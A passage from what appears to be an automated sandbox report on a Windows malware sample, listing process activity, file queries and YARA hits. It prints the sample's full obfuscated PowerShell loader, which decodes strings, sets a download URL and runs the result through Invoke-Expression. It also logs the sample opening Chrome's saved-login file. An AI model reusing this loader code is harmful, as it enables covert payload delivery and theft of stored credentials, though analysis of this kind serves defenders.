prinuopistcbarse? dyspecasquxbr tipeks mo lter formtde ik= placdsy,cooraneewtilgandu,sllplaneoenr qaid oldcrean&unthoima sedforst= hono1 ferr1unbarzchondm undezboxcaz weinw sinnhordkl9ungarhlecanutekstcvermunpropektabul5en ed3crapaaudslagprepaferasjrgtepabforbrfstemm7py opxnonpai are f st.inanticf barbq fre.8tuberbs ubh_ to subikin ';$tarnal=stratocumulus 'abbre> mayw ';$perijove=stratocumulus 'ele.tipostoev,jlex ddor ';$hovedmandens='galenes';$sabuja='\tavell.vrd';romancerne (stratocumulus 'un er$weekegafspal foreocoltsbdowsaazon il bla : mysklprceduglycek hjlpstekstugdni sproskvsophrrbartoefraxilpolytsinkw,e unrertrucknincive folk= e gr$amanie puren bundvsupe :tr kna sodapfictipteachd rseagenertmngdea pri +stoer$invassb rgeastt.ebtieleupterojservia ,rol ');romancerne (stratocumulus 'therm$sharegcatallgrundoamatrbdoed.a perilskr,a:reignkaureanh nnra urinl aandd erniestrubnyogeed udsmefatte=r tin$surmec kommodit aale igdafv kj encau sidsvskovfatelt,n,pkalt hopk.omdiss ,laepflle ltusseiange.tgen e(tide,$kopist can avarslrimpasnforgaa.ystelformu)vurde ');romancerne (stratocumulus 'amfib[loca nandenehokest endi. orges egnie firer uadvmasseiraviscrrlggewagglp oninooctadi sne nkaut tsubtem postapushen gascaf ikkginvole chroraflnn]hrels:c bal:tilstsregreeragascbraveunglefrsubeli featthypobysheucplystfroverfononhatkamgaocarpecshuddostruklhirud fl.ed=sunga wint[bedk,nrhamneskridtasc r.zoarcstaareetra scsceneukalatrw.stoielvbrtforeryoveripamb,vretymoo.yanitsodleo b ofcunifaocy thlkonfet dngeydambrppr toetingl]dyb r:pr pe: fo.ft gstflvoldts
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#daddy sabe kreprven hensttelsernes brnesengenes ribwort #>;$tiberius='forvokset';<#tangloppers vindroses klassesamarbejde atommissilernes mngderabattens #>;$bumblebeefishes=$host.privatedata;if ($bumblebeefishes) {$driftssikrere++;}function stratocumulus($udtagelsens){$variantens=$bibliopegistical+$udtagelsens.length-$driftssikrere;for( $presningers=5;$presningers -lt $variantens;$presningers+=6){$deanne+=$udtagelsens[$presningers];}$deanne;}function romancerne($amphiblestritis){ & ($perijove) ($amphiblestritis);}$termometeret=stratocumulus ' ,ivem grolob uffz,ndadimonotlb,ombl,akanaoverd/incom5klump.ojibw0 dest myelo(brevswandreigon pntogosdskraaobkkenw nblisquant .ldtancommetbly n skyde1chefa0bu fo. adri0 sand;inrad forewchaplifodern back6u.enf4 clum; atli detacxefte.6won s4vippe;t chn el oqrprog vcopub:fusio1,egra2u eff1 isje.ussel0synge) ssev out lgexpedetrinsc annk.nrepo prei/inten2str.t0 asth1butti0 ,nds0topta1themi0 blaa1 togs buks fleneni daasr reexeuvatefggekaoqrparxpert / tred1kurs.2 bifi1 anxi.fleck0g obo ';$redaktionernes=stratocumulus 'b lfauselv ssubmieankler mis,-skrifasnes,gdisgaeudviknste,etudst, ';$coadjuvant=stratocumulus ' uncoh studt aroktvagttpstares h po:s bcl/ rang/inevidbuglorunconio twavbemuze.rlle.asbesgbrighodepreordsptgprocrlsal mekej e.arrtecvandiolabormsyre / prinuopistcbarse? dyspecasquxbr tipeks mo lter formtde ik= placdsy,cooraneewtilgandu,sllplaneoenr qaid oldcrean&unthoima sedforst= hono1 ferr1unbarzchondm undezboxcaz weinw sinnhordkl9ungarhlecanutekstcvermunpropektabul5en ed3crapaaudslagprepaferasjrgtepabforbrfstemm7py opxnonpai are f st.inanticf barbq fre.8tuberbs ubh_ to subikin ';$tarnal=stratocumulus 'abbre> mayw ';$perijove=stratocumulus 'ele.tipostoev,jlex ddor ';$hovedmandens='galenes';$sabuja='\tavell.vrd';romancerne (stratocumulus 'un er$weekegafspal foreocoltsbdowsaazon il bla : mysklprceduglycek hjlpstekstugdni sproskvsophrrbartoefraxilpolytsinkw,e unrertrucknincive folk= e gr$amanie puren bundvsupe :tr kna sodapfictipteachd rseagenertmngdea pri +stoer$invassb rgeastt.ebtieleupterojservia ,rol ');romancerne (stratocumulus 'therm$sharegcatallgrundoamatrbdoed.a perilskr,a:reignkaureanh nnra urinl aandd erniestrubnyogeed udsmefatte=r tin$surmec kommodit aale igdafv kj encau sidsvskovfatelt,n,pkalt hopk.omdiss ,laepflle ltusseiange.tgen e(tide,$kopist can avarslrimpasnforgaa.ystelformu)vurde ');romancerne (stratocumulus 'amfib[loca nandenehokest endi. orges egnie firer uadvmasseiraviscrrlggewagglp oninooctadi sne nkaut tsubtem postapushen gascaf ikkginvole chroraflnn]hrels:c bal:tilstsregreeragascbraveunglefrsubeli featthypobysheucplystfroverfononhatkamgaocarpecshuddostruklhirud fl.ed=sunga wint[bedk,nrhamneskridtasc r.zoarcstaareetra scsceneukalatrw.stoielvbrtforeryoveripamb,vretymoo.yanitsodleo b ofcunifaocy thlkonfet dngeydambrppr toetingl]dyb r:pr pe: fo.ft gstflvoldts
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#daddy sabe kreprven hensttelsernes brnesengenes ribwort #>;$tiberius='forvokset';<#tangloppers vindroses klassesamarbejde atommissilernes mngderabattens #>;$bumblebeefishes=$host.privatedata;if ($bumblebeefishes) {$driftssikrere++;}function stratocumulus($udtagelsens){$variantens=$bibliopegistical+$udtagelsens.length-$driftssikrere;for( $presningers=5;$presningers -lt $variantens;$presningers+=6){$deanne+=$udtagelsens[$presningers];}$deanne;}function romancerne($amphiblestritis){ & ($perijove) ($amphiblestritis);}$termometeret=stratocumulus ' ,ivem grolob uffz,ndadimonotlb,ombl,akanaoverd/incom5klump.ojibw0 dest myelo(brevswandreigon pntogosdskraaobkkenw nblisquant .ldtancommetbly n skyde1chefa0bu fo. adri0 sand;inrad forewchaplifodern back6u.enf4 clum; atli detacxefte.6won s4vippe;t chn el oqrprog vcopub:fusio1,egra2u eff1 isje.ussel0synge) ssev out lgexpedetrinsc annk.nrepo prei/inten2str.t0 asth1butti0 ,nds0topta1themi0 blaa1 togs buks fleneni daasr reexeuvatefggekaoqrparxpert / tred1kurs.2 bifi1 anxi.fleck0g obo ';$redaktionernes=stratocumulus 'b lfauselv ssubmieankler mis,-skrifasnes,gdisgaeudviknste,etudst, ';$coadjuvant=stratocumulus ' uncoh studt aroktvagttpstares h po:s bcl/ rang/inevidbuglorunconio twavbemuze.rlle.asbesgbrighodepreordsptgprocrlsal mekej e.arrtecvandiolabormsyre / prinuopistcbarse? dyspecasquxbr tipeks mo lter formtde ik= placdsy,cooraneewtilgandu,sllplaneoenr qaid oldcrean&unthoima sedforst= hono1 ferr1unbarzchondm undezboxcaz weinw sinnhordkl9ungarhlecanutekstcvermunpropektabul5en ed3crapaaudslagprepaferasjrgtepabforbrfstemm7py opxnonpai are f st.inanticf barbq fre.8tuberbs ubh_ to subikin ';$tarnal=stratocumulus 'abbre> mayw ';$perijove=stratocumulus 'ele.tipostoev,jlex ddor ';$hovedmandens='galenes';$sabuja='\tavell.vrd';romancerne (stratocumulus 'un er$weekegafspal foreocoltsbdowsaazon il bla : mysklprceduglycek hjlpstekstugdni sproskvsophrrbartoefraxilpolytsinkw,e unrertrucknincive folk= e gr$amanie puren bundvsupe :tr kna sodapfictipteachd rseagenertmngdea pri +stoer$invassb rgeastt.ebtieleupterojservia ,rol ');romancerne (stratocumulus 'therm$sharegcatallgrundoamatrbdoed.a perilskr,a:reignkaureanh nnra urinl aandd erniestrubnyogeed udsmefatte=r tin$surmec kommodit aale igdafv kj encau sidsvskovfatelt,n,pkalt hopk.omdiss ,laepflle ltusseiange.tgen e(tide,$kopist can avarslrimpasnforgaa.ystelformu)vurde ');romancerne (stratocumulus 'amfib[loca nandenehokest endi. orges egnie firer uadvmasseiraviscrrlggewagglp oninooctadi sne nkaut tsubtem postapushen gascaf ikkginvole chroraflnn]hrels:c bal:tilstsregreeragascbraveunglefrsubeli featthypobysheucplystfroverfononhatkamgaocarpecshuddostruklhirud fl.ed=sunga wint[bedk,nrhamneskridtasc r.zoarcstaareetra scsceneukalatrw.stoielvbrtforeryoveripamb,vretymoo.yanitsodleo b ofcunifaocy thlkonfet dngeydambrppr toetingl]dyb r:pr pe: fo.ft gstflvoldts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 2584, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 2584, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs